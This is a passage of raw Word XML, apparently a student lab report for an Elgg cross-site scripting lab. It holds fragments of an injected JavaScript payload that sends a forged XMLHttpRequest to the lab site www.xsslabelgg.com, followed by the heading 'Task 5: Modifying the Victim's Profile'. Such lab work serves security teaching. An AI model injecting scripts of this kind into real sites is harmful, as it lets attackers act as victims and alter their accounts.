                    <w:p w14:paraId="587188DB" w14:textId="77777777" w:rsidR="00B0256F" w:rsidRDefault="00B0256F" w:rsidP="00B0256F">
                      <w:pPr>
                        <w:spacing w:after="0"/>
                      </w:pPr>
                      <w:r>
                        <w:t xml:space="preserve">Ajax=new </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:proofErr w:type="gramStart"/>
                      <w:r>
                        <w:t>XMLHttpRequest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169C1161" w14:textId="77777777" w:rsidR="00B0256F" w:rsidRDefault="00B0256F" w:rsidP="00B0256F">
                      <w:pPr>
                        <w:spacing w:after="0"/>
                      </w:pPr>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>Ajax.open</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t>("GET</w:t>
                      </w:r>
                      <w:proofErr w:type="gramStart"/>
                      <w:r>
                        <w:t>",</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>sendurl</w:t>
                      </w:r>
                      <w:proofErr w:type="gramEnd"/>
                      <w:r>
                        <w:t>,true</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t>);</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="7C536537" w14:textId="77777777" w:rsidR="00B0256F" w:rsidRDefault="00B0256F" w:rsidP="00B0256F">
                      <w:pPr>
                        <w:spacing w:after="0"/>
                      </w:pPr>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>Ajax.setRequestHeader</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t>("Host","www.xsslabelgg.com");</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="265EEAEA" w14:textId="77777777" w:rsidR="00B0256F" w:rsidRDefault="00B0256F" w:rsidP="00B0256F">
                      <w:pPr>
                        <w:spacing w:after="0"/>
                      </w:pPr>
                      <w:r>
                        <w:t>Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2266D745" w14:textId="77777777" w:rsidR="00B0256F" w:rsidRDefault="00B0256F" w:rsidP="00B0256F">
                      <w:pPr>
                        <w:spacing w:after="0"/>
                      </w:pPr>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>Ajax.send</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t>();</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5E5D37C0" w14:textId="77777777" w:rsidR="00B0256F" w:rsidRDefault="00B0256F" w:rsidP="00B0256F">
                      <w:pPr>
                        <w:spacing w:after="0"/>
                      </w:pPr>
                      <w:r>
                        <w:t>}</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="1558F7C8" w14:textId="393097BE" w:rsidR="00B0256F" w:rsidRDefault="00B0256F" w:rsidP="00B0256F">
                      <w:pPr>
                        <w:spacing w:after="0"/>
                      </w:pPr>
                      <w:r>
                        <w:t>&lt;/script&gt;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F8B4404" w14:textId="4336FAE7" w:rsidR="00B0256F" w:rsidRDefault="00B0256F" w:rsidP="00B0256F"/>
    <w:p w14:paraId="2FA25CF2" w14:textId="51FB1FE5" w:rsidR="00892138" w:rsidRDefault="00892138" w:rsidP="00892138">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00892138">
        <w:t>Task 5: Modifying the Victim’s Profile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F9EB0F" w14:textId="77777777" w:rsidR="00892138" w:rsidRPr="00892138" w:rsidRDefault="00892138" w:rsidP="00892138"/>
    <w:sectPr w:rsidR="00892138" w:rsidRPr="008921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BB3"/>
    <w:rsid w:val="00087931"/>
    <w:rsid w:val="007472A0"/>
    <w:rsid w:val="00892138"/>
    <w:rsid w:val="00B0256F"/>
    <w:rsid w:val="00D84BB3"/>
    <w:rsid w:val="00EF1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4E5CA"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{072946AA-7BDA-47A1-BC24-657F06AC9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4BB3"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="360" w:after="80"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="minorHAns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4B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4B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4B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4B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4B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4B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4B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4B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4BB3"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="minorHAns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4B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4B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4B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4B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4B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4B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4B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4B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4B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4B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4B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4B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4B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4B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4B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4B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4B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4B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4BB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6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IIT DU</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>IIT DU</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-05-05T02:16:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-05T04:58:00Z</dcterms:modified>
</cp:coreProperties>
</file>